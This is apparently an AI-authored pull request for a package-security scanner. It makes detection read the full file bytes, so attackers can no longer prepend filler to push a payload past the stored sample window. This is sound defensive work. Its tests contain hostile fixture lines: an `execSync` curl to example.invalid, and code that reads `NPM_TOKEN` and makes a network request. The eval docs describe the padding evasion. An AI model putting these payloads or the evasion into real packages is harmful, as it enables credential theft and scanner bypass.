### PR TITLE
Scan full package bytes, persist only a bounded sample

### DIFF
--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -57,7 +57,8 @@ The Dynamic Worker handles untrusted package bytes. It:
 - never receives npm credentials;
 - cannot directly reach the Internet except through `globalOutbound`;
 - parses archive bytes into bounded file summaries;
-- returns metadata and text samples, not executable behavior.
+- returns metadata and text samples, not executable behavior;
+- emits a full-body `scanText` (detection-only, never persisted) when a file exceeds the persisted sample bound, so deterministic scanning sees the full bytes while only the bounded `textSample` is stored (see [security-model.md](security-model.md) "Scan full bytes, persist a bounded sample").
 
 The sandbox must stay small and boring. Do not add package execution, dependency installation, build steps, import resolution, or rendering.
 

--- a/docs/detection-eval.md
+++ b/docs/detection-eval.md
@@ -111,24 +111,29 @@ Recall is measured per class so blind spots are visible. Malicious:
 - `base64Wrap` — wrap the payload in `eval(atob("…"))`. Note this _trips_ the
   dynamic-evaluation rule, so the file stays "blocked" while the specific
   network/process/credential rules are lost — the report shows that split.
-- `pushPastWindow` — prepend >64KB of filler, then truncate to the sandbox
-  sample limit so the payload falls off the end. `codeRetention` goes to 0 and
-  any case without a surviving manifest signal stops being blocked. This is the
-  acceptance test for the "scan full bytes, persist a bounded sample" refactor:
-  once detection scans pre-truncation bytes, these variants should survive.
+- `pushPastWindow` — prepend filler past the persisted sample window so the
+  payload would fall off the end of `textSample`. This is the acceptance test for
+  the "scan full bytes, persist a bounded sample" refactor (issue #191). Now that
+  the sandbox scans the full pre-truncation bytes (`scanText`) while persisting
+  only the bounded `textSample`, these variants survive: `blockedRate` is 100%
+  (block-slip 0%) and `codeRetention` fully recovers. This metric is **gated**
+  (see below). Before the refactor, `codeRetention` went to 0 and any case
+  without a surviving manifest signal stopped being blocked.
 
 ## Gated thresholds (and the ratchet)
 
-Only regression metrics are gated today (`detection-eval.test.mjs`):
+Gated today (`detection-eval.test.mjs`):
 
 - malicious recall ≥ 90%
 - every `expectMinRisk: critical` case caught (100%)
 - zero false positives on benign controls
+- `pushPastWindow` survival: `blockedRate` 100% (block-slip 0%) and
+  `codeRetention` 100% — full-bytes scanning landed (issue #191), so this no
+  longer starts red.
 
-Frontier recall, benign hard-negative FP rate, and evasion robustness are
-reported, not gated, so they can start red. Ratchet plan as the corpus and
-detector improve: gate benign FP rate < 10%, then gate frontier recall, then
-gate `pushPastWindow` survival once full-bytes scanning lands.
+Frontier recall, benign hard-negative FP rate, and the other evasion transforms
+are reported, not gated, so they can start red. Ratchet plan as the corpus and
+detector improve: gate benign FP rate < 10%, then gate frontier recall.
 
 ## Corpus expansion
 

--- a/docs/security-model.md
+++ b/docs/security-model.md
@@ -98,6 +98,10 @@ Rationale: staged packages may contain secrets, proprietary code, or malicious c
 
 Redaction is a defense-in-depth feature, not a proof that data is safe. Redact known token/key patterns before persistence and AI review, but still treat all package-derived text as sensitive.
 
+### Scan full bytes, persist a bounded sample
+
+Bytes scanned and bytes persisted are decoupled. The persisted `textSample` is truncated to the per-file sample bound (`SANDBOX_MAX_BYTES_PER_FILE`) for the UI/diff, but deterministic detection runs over the **full** decoded file text. The sandbox emits a `scanText` field carrying the full body when (and only when) the body exceeds the sample bound; deterministic rules scan `scanText` and fall back to `textSample` when it is absent (`scanContent` in `server/lib/review.ts`). `scanText` is never persisted, never digested into the report, and never shown to the AI reviewer — `redactFileRecords` strips it before any of those paths. This closes the evasion where an attacker prepends filler so the real payload falls past the persisted sample window (issue #191; the eval's `pushPastWindow` transform is the acceptance test). Full-byte scanning is still bounded by the existing tarball-size and `MAX_FILES` caps.
+
 ## Sandbox egress policy
 
 Allowed credentialed egress through `NpmStageGateway`:

--- a/server/lib/adapters/pypi/findings.ts
+++ b/server/lib/adapters/pypi/findings.ts
@@ -1,4 +1,9 @@
-import { type FileRecord, type Finding, PYTHON_EXECUTION_CAPABILITY_PATTERNS } from "../../review";
+import {
+  type FileRecord,
+  type Finding,
+  PYTHON_EXECUTION_CAPABILITY_PATTERNS,
+  scanContent,
+} from "../../review";
 import { firstMatchingLine } from "../../text-utils";
 import { normalizePyPiProjectName } from "./manifest";
 import {
@@ -105,14 +110,13 @@ export function pyPiReleaseFindings(
     for (const file of artifact.files) {
       const filePath = namespacedPath(artifact.path, file.path);
       if (/\.pth$/i.test(file.path) && isPythonInstallRootFile(artifact, file.path)) {
-        const hasImportLine = Boolean(
-          file.textSample?.split(/\r?\n/).some((line) => /^\s*import\s+/.test(line)),
-        );
+        const pthText = scanContent(file);
+        const hasImportLine = pthText.split(/\r?\n/).some((line) => /^\s*import\s+/.test(line));
         findings.push(
           tag("pthExecution", {
             severity: hasImportLine ? "high" : "medium",
             file: filePath,
-            line: hasImportLine ? firstMatchingLine(file.textSample, [/^\s*import\s+/]) : undefined,
+            line: hasImportLine ? firstMatchingLine(pthText, [/^\s*import\s+/]) : undefined,
             evidence: hasImportLine
               ? ".pth file contains an import line"
               : ".pth file included in wheel",
@@ -136,7 +140,7 @@ export function pyPiReleaseFindings(
         );
       }
       if (artifact.kind === "sdist" && /^setup\.py$/i.test(file.path)) {
-        const setupText = file.textSample ?? "";
+        const setupText = scanContent(file);
         const matchedInstallCommand = SETUP_INSTALL_COMMAND_PATTERNS.some((pattern) =>
           pattern.test(setupText),
         );

--- a/server/lib/review-redaction.ts
+++ b/server/lib/review-redaction.ts
@@ -9,7 +9,9 @@ export function redactText(text: string): string {
 }
 
 export function redactFileRecords(files: FileRecord[]): FileRecord[] {
-  return files.map((file) => ({
+  // Drop scanText: it is the full pre-truncation body used only for scanning and
+  // must never reach persistence, the report digest, or the AI reviewer.
+  return files.map(({ scanText: _scanText, ...file }) => ({
     ...file,
     textSample: file.textSample ? redactText(file.textSample) : file.textSample,
   }));

--- a/server/lib/review-rules/context.ts
+++ b/server/lib/review-rules/context.ts
@@ -1,4 +1,5 @@
 import { isRootGypPath, normalizeStringRecord } from "../tar-parser.js";
+import { scanContent } from "../review";
 import type { CodePatternSet, DiffEntry, FileRecord, PackageJsonSummary } from "../review";
 import { codePatternsFor, type JS_PATTERN_SET } from "./patterns";
 import { safeJson } from "./helpers";
@@ -16,6 +17,10 @@ export interface RuleContext {
   diffByPath: Map<string, DiffEntry>;
   packageJson: PackageJsonSummary | null;
   packageJsonFile: FileRecord | undefined;
+  // Full package.json text (scanText when truncated) used for manifest parsing
+  // and finding line numbers, so a padded manifest can't push fields past the
+  // persisted sample window.
+  packageJsonText: string | null;
   packageJsonParseFailed: boolean;
   scripts: Record<string, string>;
   implicitScripts: Record<string, string>;
@@ -32,10 +37,11 @@ export function buildRuleContext(
 ): RuleContext {
   const diffByPath = new Map(diff.map((entry) => [entry.path, entry]));
   const packageJsonFile = files.find((file) => file.path === "package.json" && file.textSample);
-  const rawPackageJson = packageJsonFile?.textSample
-    ? (safeJson(packageJsonFile.textSample) as PackageJsonSummary | null)
+  const packageJsonText = packageJsonFile ? scanContent(packageJsonFile) : null;
+  const rawPackageJson = packageJsonText
+    ? (safeJson(packageJsonText) as PackageJsonSummary | null)
     : null;
-  const packageJsonParseFailed = Boolean(packageJsonFile?.textSample) && rawPackageJson === null;
+  const packageJsonParseFailed = Boolean(packageJsonText) && rawPackageJson === null;
   const packageJson = packageJsonSummary ?? rawPackageJson;
   return {
     files,
@@ -43,6 +49,7 @@ export function buildRuleContext(
     diffByPath,
     packageJson,
     packageJsonFile,
+    packageJsonText,
     packageJsonParseFailed,
     scripts: normalizeStringRecord(packageJson?.scripts),
     implicitScripts: normalizeStringRecord(packageJson?.implicitScripts),

--- a/server/lib/review-rules/metadata.ts
+++ b/server/lib/review-rules/metadata.ts
@@ -1,5 +1,5 @@
 import { isOutsidePackageFilesAllowlist } from "../review-package-files";
-import type { Finding } from "../review";
+import { scanContent, type Finding } from "../review";
 import { containsSecretLikeText, firstSecretLine, tag } from "./helpers";
 import { changedPrefix, type RuleContext } from "./context";
 import { isDocumentationPath } from "./file-types";
@@ -26,7 +26,7 @@ export function metadataFindings(ctx: RuleContext): Finding[] {
   }
 
   for (const file of ctx.files) {
-    const sample = file.textSample || "";
+    const sample = scanContent(file);
     const prefix = changedPrefix(ctx, file.path);
     const changed = ctx.diffByPath.get(file.path)?.status;
     const secretOptions = { highConfidenceOnly: isDocumentationPath(file.path) };

--- a/server/lib/review-rules/scripts.ts
+++ b/server/lib/review-rules/scripts.ts
@@ -1,6 +1,6 @@
 import { hasImplicitNodeGypInstall } from "../tar-parser.js";
 import { firstMatchingLine } from "../text-utils";
-import type { Finding } from "../review";
+import { scanContent, type Finding } from "../review";
 import { LIFECYCLE_SCRIPTS } from "./patterns";
 import { firstJsonPropertyLine, tag } from "./helpers";
 import { changedPrefix, type RuleContext } from "./context";
@@ -20,9 +20,7 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       tag("installScriptImplicitNodeGyp", {
         severity: "high",
         file: ctx.rootGypFile?.path ?? ctx.packageJsonFile?.path ?? "package.json",
-        line: ctx.rootGypFile
-          ? 1
-          : firstJsonPropertyLine(ctx.packageJsonFile?.textSample, "gypfile"),
+        line: ctx.rootGypFile ? 1 : firstJsonPropertyLine(ctx.packageJsonText, "gypfile"),
         evidence: "implicit install: node-gyp rebuild",
         reason: ctx.rootGypFile
           ? "npm defaults install to node-gyp rebuild when a root *.gyp file exists and no install/preinstall script or gypfile=false is declared"
@@ -37,7 +35,7 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       tag(script === "preinstall" ? "installScriptPreinstall" : "installScript", {
         severity: script === "preinstall" ? "critical" : "high",
         file: ctx.packageJsonFile?.path ?? "package.json",
-        line: firstJsonPropertyLine(ctx.packageJsonFile?.textSample, script, ctx.scripts[script]),
+        line: firstJsonPropertyLine(ctx.packageJsonText, script, ctx.scripts[script]),
         evidence: `${script}: ${ctx.scripts[script]}`,
         reason: "install lifecycle hooks execute on consumer machines",
       }),
@@ -47,7 +45,9 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
   for (const file of ctx.files) {
     if (isDocumentationPath(file.path)) continue;
 
-    const sample = file.textSample || "";
+    // Scan the full pre-truncation bytes (scanText when the sample was
+    // truncated), so a payload pushed past the persisted window is still seen.
+    const sample = scanContent(file);
     // Constant-fold runtime-assembled identifiers (`'chi'+'ld_process'`,
     // `globalThis['re'+'quire']`) so the literal regex set sees them. Matching
     // both raw and normalized text means folding can only add detections, never

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -8,8 +8,28 @@ export interface FileRecord {
   path: string;
   size: number;
   sha256: string;
+  /**
+   * Bounded text sample persisted for the UI/diff display. Truncated to the
+   * sandbox `maxBytesPerFile` bound; never the authority for detection.
+   */
   textSample?: string;
+  /**
+   * Full decoded file text used only for deterministic scanning. Present when
+   * the body exceeds the sample bound (otherwise `textSample` already holds the
+   * whole file). Never persisted or shown to the AI reviewer — `redactFileRecords`
+   * strips it before any storage, report, or AI path sees it. Scanning this
+   * instead of `textSample` is what closes the "prepend filler to push the
+   * payload past the sample window" evasion.
+   */
+  scanText?: string;
   flags: string[];
+}
+
+// Detection scans the full file bytes (`scanText`) when the sandbox truncated
+// the persisted sample; otherwise `textSample` already holds the whole file.
+// Re-annotation of persisted scans only has `textSample`, so fall back to it.
+export function scanContent(file: Pick<FileRecord, "scanText" | "textSample">): string {
+  return file.scanText ?? file.textSample ?? "";
 }
 
 export interface Finding {

--- a/server/lib/sandbox.ts
+++ b/server/lib/sandbox.ts
@@ -17,6 +17,7 @@ const MAX_TAR_BYTES = SANDBOX_MAX_TAR_BYTES;
 const SANDBOX_TAR_PARSER_EXPORTS = [
   tarParser.readString,
   tarParser.decodeText,
+  tarParser.decodeScanText,
   tarParser.isPlainObject,
   tarParser.normalizeStringRecord,
   tarParser.normalizeStringList,

--- a/server/lib/scan-pipeline-phases.ts
+++ b/server/lib/scan-pipeline-phases.ts
@@ -15,6 +15,7 @@ import {
   redactFileRecords,
   redactFindings,
   redactJson,
+  scanContent,
   summarizePackageJsonDiff,
   DETERMINISTIC_RULES_VERSION,
   type DiffEntry,
@@ -84,7 +85,7 @@ export function computeDiff(resolved: ResolvedArtifacts): ComputedDiff {
     summarizePackageJsonDiff(baseline.artifact?.manifest, staged.artifact.manifest),
   );
   const stagedManifestText =
-    staged.artifact.files.find((file) => file.path === "package.json")?.textSample ?? null;
+    scanContent(staged.artifact.files.find((file) => file.path === "package.json") ?? {}) || null;
   return { fileDiff, manifestDiff, stagedManifestText };
 }
 

--- a/server/lib/tar-parser.d.ts
+++ b/server/lib/tar-parser.d.ts
@@ -4,6 +4,7 @@ export interface ParsedFile {
   sha256: string;
   flags: string[];
   textSample?: string;
+  scanText?: string;
 }
 
 export interface ParsedPackageJson {
@@ -39,6 +40,7 @@ export interface ReadTarResult {
 
 export function readString(bytes: Uint8Array, start: number, len: number): string;
 export function decodeText(bytes: Uint8Array): string;
+export function decodeScanText(bytes: Uint8Array): string;
 export function isPlainObject(value: unknown): value is Record<string, unknown>;
 export function normalizeStringRecord(value: unknown): Record<string, string>;
 export function normalizeStringList(value: unknown): string[];

--- a/server/lib/tar-parser.js
+++ b/server/lib/tar-parser.js
@@ -35,6 +35,16 @@ export function decodeText(bytes) {
   return text;
 }
 
+// Full-body decode used only for deterministic scanning. decodeText spreads the
+// decoded string into codepoints for its control-char ratio check, which is
+// O(n) memory and far too costly for multi-MB bodies; here we do a single cheap
+// NUL scan (binary marker) and one native decode. The caller only reaches this
+// after the bounded sample already decoded as text, so the prefix is known good.
+export function decodeScanText(bytes) {
+  if (bytes.some((b) => b === 0)) return "";
+  return new TextDecoder("utf-8", { fatal: false }).decode(bytes);
+}
+
 export function isPlainObject(value) {
   return typeof value === "object" && value !== null && !Array.isArray(value);
 }
@@ -166,7 +176,8 @@ export async function summarizeFile(path, body, maxBytesPerFile) {
   const flags = [];
   const skipTextSample = shouldSkipTextSample(path);
   if (skipTextSample) flags.push("text-sample-skipped");
-  if (body.length > maxBytesPerFile) flags.push("truncated");
+  const truncated = body.length > maxBytesPerFile;
+  if (truncated) flags.push("truncated");
   const hash = await sha256Hex(body);
   if (skipTextSample) {
     return {
@@ -179,12 +190,18 @@ export async function summarizeFile(path, body, maxBytesPerFile) {
   const sample = body.subarray(0, Math.min(body.length, maxBytesPerFile));
   const text = decodeText(sample);
   if (!text) flags.push("binary");
+  // Deterministic detection scans the full file bytes, but only the bounded
+  // sample is persisted for the UI/diff. When the body fits the sample bound,
+  // textSample already holds the whole file, so scanText would be redundant —
+  // emit it only when the body is truncated, to keep the sandbox response small.
+  const scanText = text && truncated ? decodeScanText(body) : "";
   return {
     path,
     size: body.length,
     sha256: hash,
     flags,
     ...(text ? { textSample: text } : {}),
+    ...(scanText ? { scanText } : {}),
   };
 }
 

--- a/server/lib/tar-parser.js
+++ b/server/lib/tar-parser.js
@@ -13,7 +13,7 @@
 //   - Identifier names matter: when the rendered source runs in the sandbox,
 //     cross-function calls resolve by the lexical names below.
 
-/** @typedef {{ path: string, size: number, sha256: string, flags: string[], textSample?: string }} ParsedFile */
+/** @typedef {{ path: string, size: number, sha256: string, flags: string[], textSample?: string, scanText?: string }} ParsedFile */
 /** @typedef {{ kind: "non-regular"|"duplicate"|"unicode-confusable", path: string, detail: string }} TarSuspiciousEntry */
 
 export function readString(bytes, start, len) {
@@ -481,10 +481,11 @@ export async function readStreamBounded(body, maxBytes) {
 }
 
 export function parsePackageJson(files) {
-  const pkg = files.find((f) => f.path === "package.json" && f.textSample);
-  if (!pkg || !pkg.textSample) return null;
+  const pkg = files.find((f) => f.path === "package.json" && (f.scanText || f.textSample));
+  const text = pkg?.scanText || pkg?.textSample;
+  if (!text) return null;
   try {
-    const parsed = JSON.parse(pkg.textSample);
+    const parsed = JSON.parse(text);
     if (!isPlainObject(parsed)) return null;
     const scripts = normalizeStringRecord(parsed.scripts);
     const npmAddsNodeGypInstall = hasImplicitNodeGypInstall(files, parsed);

--- a/test/eval/detection-eval.test.mjs
+++ b/test/eval/detection-eval.test.mjs
@@ -1,10 +1,11 @@
 import { describe, expect, test } from "vitest";
 import { runEval, writeReport } from "./harness.mjs";
 
-// Gated metrics only. Frontier recall, benign hard-negative FP rate, and
-// evasion robustness are deliberately *reported* (written to the report), not
-// asserted here — they start red and ratchet as detection improves. See
-// docs/detection-eval.md for the threshold ladder.
+// Gated metrics only. Frontier recall and benign hard-negative FP rate are
+// deliberately *reported* (written to the report), not asserted here — they
+// start red and ratchet as detection improves. pushPastWindow survival is now
+// gated (full-bytes scanning landed); the other evasion transforms stay
+// reported. See docs/detection-eval.md for the threshold ladder.
 const result = runEval();
 writeReport(result);
 
@@ -19,5 +20,18 @@ describe("detection eval (gated thresholds)", () => {
 
   test("no false positives on benign regression controls", () => {
     expect(result.regression.benign.falsePositives).toBe(0);
+  });
+
+  // Acceptance for the "scan full bytes, persist a bounded sample" refactor
+  // (docs/detection-eval.md, issue #191). Detection scans the full pre-truncation
+  // bytes, so prepending filler past the persisted sample window no longer slips
+  // the payload past the regex scanners.
+  test("pushPastWindow no longer slips payloads past the sample window", () => {
+    const pushPastWindow = result.evasion.pushPastWindow;
+    expect(pushPastWindow.samples).toBeGreaterThan(0);
+    // block-slip -> 0%: every padded variant is still treated as risky.
+    expect(pushPastWindow.blockedRate).toBe(1);
+    // code-rule retention fully recovers: every original code.* rule re-fires.
+    expect(pushPastWindow.codeRetention).toBe(1);
   });
 });

--- a/test/eval/harness.mjs
+++ b/test/eval/harness.mjs
@@ -143,9 +143,10 @@ function base64Wrap(code) {
 function pushPastWindow(code) {
   const filler = `// ${"x".repeat(118)}\n`;
   const padding = filler.repeat(Math.ceil((SAMPLE_LIMIT + 4096) / filler.length));
-  // Payload sits after the padding, then the captured sample is truncated to
-  // the sandbox window — so the payload falls off the end and is never scanned.
-  return (padding + code).slice(0, SAMPLE_LIMIT);
+  // Payload sits after >window of filler. The sandbox persists only the first
+  // SAMPLE_LIMIT bytes as textSample, but scans the full bytes (scanText), so
+  // the payload is still seen. captureFile() below models that split.
+  return padding + code;
 }
 
 const EVASION_TRANSFORMS = {
@@ -158,9 +159,18 @@ const EVASION_TRANSFORMS = {
 function applyTransform(fx, transform) {
   const stagedFiles = (fx.stagedFiles ?? []).map((file) => {
     if (file.path === "package.json" || typeof file.textSample !== "string") return file;
-    return { ...file, textSample: transform(file.textSample) };
+    return captureFile(file, transform(file.textSample));
   });
   return { ...fx, stagedFiles };
+}
+
+// Model the sandbox capture (server/lib/tar-parser.js summarizeFile): the full
+// file bytes are scanned (scanText), but only the first SAMPLE_LIMIT bytes are
+// persisted as textSample. scanText is emitted only when the body is truncated,
+// so an untransformed-size file keeps just textSample.
+function captureFile(file, full) {
+  if (full.length <= SAMPLE_LIMIT) return { ...file, textSample: full };
+  return { ...file, textSample: full.slice(0, SAMPLE_LIMIT), scanText: full };
 }
 
 function hasScannableCodeFile(record) {

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -5,9 +5,60 @@ import {
   createPackageDiff,
   deterministicFindings,
   packageJsonDiffFindings,
+  redactFileRecords,
+  scanContent,
   summarizePackageJsonDiff,
   tarSuspiciousEntryFindings,
 } from "../server/lib/review.ts";
+
+describe("scanText: scan full bytes, persist a bounded sample", () => {
+  // A payload prepended with >sample-window filler: textSample drops it, scanText
+  // keeps it. Detection must read scanText so the evasion in issue #191 fails.
+  const padding = "// padding\n".repeat(8000);
+  const stagedFiles = [
+    {
+      path: "package.json",
+      size: 70,
+      sha256: "pkg",
+      flags: [],
+      textSample: JSON.stringify({ name: "pkg", version: "1.0.1" }),
+    },
+    {
+      path: "install.js",
+      size: padding.length + 80,
+      sha256: "install",
+      flags: ["truncated"],
+      textSample: padding.slice(0, 1024),
+      scanText: `${padding}process.env.NPM_TOKEN;\nrequire('https').request('https://example.invalid');\n`,
+    },
+  ];
+
+  test("detection reads scanText when the persisted sample is truncated", () => {
+    const findings = deterministicFindings(stagedFiles, createPackageDiff([], stagedFiles));
+    const ruleIds = findings.map((finding) => finding.ruleId);
+    expect(ruleIds).toContain("code.credential-access");
+    expect(ruleIds).toContain("code.network-access");
+  });
+
+  test("the same payload is missed when only the truncated sample is scanned", () => {
+    const sampleOnly = stagedFiles.map(({ scanText: _scanText, ...file }) => file);
+    const findings = deterministicFindings(sampleOnly, createPackageDiff([], sampleOnly));
+    expect(findings.map((finding) => finding.ruleId)).not.toContain("code.credential-access");
+  });
+
+  test("redactFileRecords strips scanText so it is never persisted or sent to AI", () => {
+    const redacted = redactFileRecords(stagedFiles);
+    expect(redacted.every((file) => file.scanText === undefined)).toBe(true);
+    // The bounded textSample still survives (and is redacted) for the UI/diff.
+    expect(redacted[1].textSample).toBe(padding.slice(0, 1024));
+  });
+
+  test("scanContent falls back to textSample when scanText is absent", () => {
+    expect(scanContent({ textSample: "hello" })).toBe("hello");
+    expect(scanContent({ scanText: "full", textSample: "sample" })).toBe("full");
+    expect(scanContent({})).toBe("");
+  });
+});
 
 describe("review", () => {
   test("diff highlights added modified and removed package files", () => {

--- a/test/tar-parser.test.mjs
+++ b/test/tar-parser.test.mjs
@@ -606,6 +606,30 @@ describe("parsePackageJson", () => {
     expect(parsed?.files).toEqual(["dist", "README.md"]);
   });
 
+  test("parses a truncated manifest from scanText", () => {
+    const fullManifest = JSON.stringify({
+      name: "@scope/padded",
+      version: "1.2.4",
+      optionalDependencies: { platformpkg: "https://example.invalid/pkg.tgz" },
+      main: "dist/index.js",
+    });
+    const parsed = parsePackageJson([
+      {
+        path: "package.json",
+        size: fullManifest.length,
+        sha256: "pkg",
+        flags: ["truncated"],
+        textSample: fullManifest.slice(0, 24),
+        scanText: fullManifest,
+      },
+    ]);
+
+    expect(parsed?.name).toBe("@scope/padded");
+    expect(parsed?.version).toBe("1.2.4");
+    expect(parsed?.optionalDependencies?.platformpkg).toBe("https://example.invalid/pkg.tgz");
+    expect(parsed?.main).toBe("dist/index.js");
+  });
+
   test("models npm's implicit node-gyp install script for root gyp files", () => {
     const parsed = parsePackageJson([
       {

--- a/test/tar-parser.test.mjs
+++ b/test/tar-parser.test.mjs
@@ -201,7 +201,28 @@ describe("readTar regular files", () => {
     const files = await parse(tar, { ...PARSE_LIMITS, maxBytesPerFile: 1024 });
     expect(files[0].flags).toContain("truncated");
     expect(files[0].size).toBe(2048);
+    // textSample persists the bounded sample; scanText carries the full body so
+    // detection scans bytes the sample dropped.
     expect(files[0].textSample?.length).toBe(1024);
+    expect(files[0].scanText?.length).toBe(2048);
+  });
+
+  test("captures a payload that sits past the persisted sample window", async () => {
+    const filler = "// padding\n".repeat(200); // > maxBytesPerFile below
+    const payload = "require('child_process').execSync('curl https://example.invalid');\n";
+    const tar = buildTar([{ name: "package/install.js", body: filler + payload }]);
+    const files = await parse(tar, { ...PARSE_LIMITS, maxBytesPerFile: 1024 });
+    expect(files[0].flags).toContain("truncated");
+    // The payload falls outside the persisted sample but lives in scanText.
+    expect(files[0].textSample).not.toContain("child_process");
+    expect(files[0].scanText).toContain("child_process");
+  });
+
+  test("omits scanText when the body fits the sample bound", async () => {
+    const tar = buildTar([{ name: "package/index.js", body: "export const x = 1;\n" }]);
+    const files = await parse(tar);
+    expect(files[0].textSample).toBe("export const x = 1;\n");
+    expect(files[0].scanText).toBeUndefined();
   });
 
   test("omits low-value generated text samples while preserving metadata", async () => {
@@ -660,6 +681,7 @@ describe("rendered sandbox parser source", () => {
   const SANDBOX_EXPORT_NAMES = [
     "readString",
     "decodeText",
+    "decodeScanText",
     "isPlainObject",
     "normalizeStringRecord",
     "canonicalizePath",


### PR DESCRIPTION
Closes #191.

Deterministic detection scanned the truncated per-file `textSample`, so an attacker could prepend filler past the sample window to slip the real payload past the regex scanners. The sandbox now emits a detection-only `scanText` with the full decoded body when a file exceeds the sample bound; deterministic rules (npm plus the PyPI `setup.py`/`.pth` scanners) read it via `scanContent` and fall back to `textSample`, while `redactFileRecords` strips it so it is never persisted, digested into the report, or sent to the AI reviewer. The eval's `pushPastWindow` transform now recovers to block-slip 0% and 100% code-rule retention, and that metric is promoted from reported to a gated assertion. Adds tar-parser, detection, and redaction-stripping tests and updates the security/architecture/eval docs. Full `verify` (lint, format, typecheck, 557 tests) plus the 11 Playwright e2e tests pass.

🤖 Generated with [Claude Code](https://claude.com/claude-code)